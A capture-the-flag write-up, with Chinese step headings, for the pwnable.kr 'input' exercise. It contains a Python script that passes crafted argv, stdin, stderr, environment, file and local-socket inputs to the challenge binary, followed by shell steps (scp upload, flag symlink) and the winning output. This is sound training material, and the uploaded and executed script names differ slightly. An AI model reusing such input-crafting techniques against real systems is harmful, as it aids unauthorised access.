pwnable.kr input

1. 编写脚本

import os,socket,sys,time,subprocess

#argv
args = ['filename'] + ["A"] * 99
args[ord('A')] = ""
args[ord('B')] = "\x20\x0a\x0d"
args[ord('C')] = "8444"


#stdio
stdinr, stdinw = os.pipe()
stderrr, stderrw = os.pipe()
os.write(stdinw,"\x00\x0a\x00\xff")
os.write(stderrw,"\x00\x0a\x02\xff")

#env
environ = {"\xde\xad\xbe\xef":"\xca\xfe\xba\xbe"}

# file io
with open("\x0a","wb") as f:
	f.write("\x00"*4)

#network
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

proc = subprocess.Popen(["/home/input2/input"] + args[1:],stdin = stdinr,stderr = stderrr, env = environ)

time.sleep(2)
s.connect(('127.0.0.1',8444))
s.send('\xde\xad\xbe\xef')
s.close()
time.sleep(2)

2. 在服务器上创建目录

mkdir godspeed
cd godspeed

3. 上传脚本至指定位置

scp -P 2222 test.py [email protected]:/tmp/godspeed

4. 建立软链接

ln -s /home/input2/flag flag

5.运行脚本获得flag

input2@pwnable:/tmp/godspeed$ python youneverknow4.py
Welcome to pwnable.kr
Let's see if you know how to give input to program
Just give me correct inputs then you will get the flag :)
Stage 1 clear!
Stage 2 clear!
Stage 3 clear!
Stage 4 clear!
Stage 5 clear!
Mommy! I learned how to pass various input in Linux :)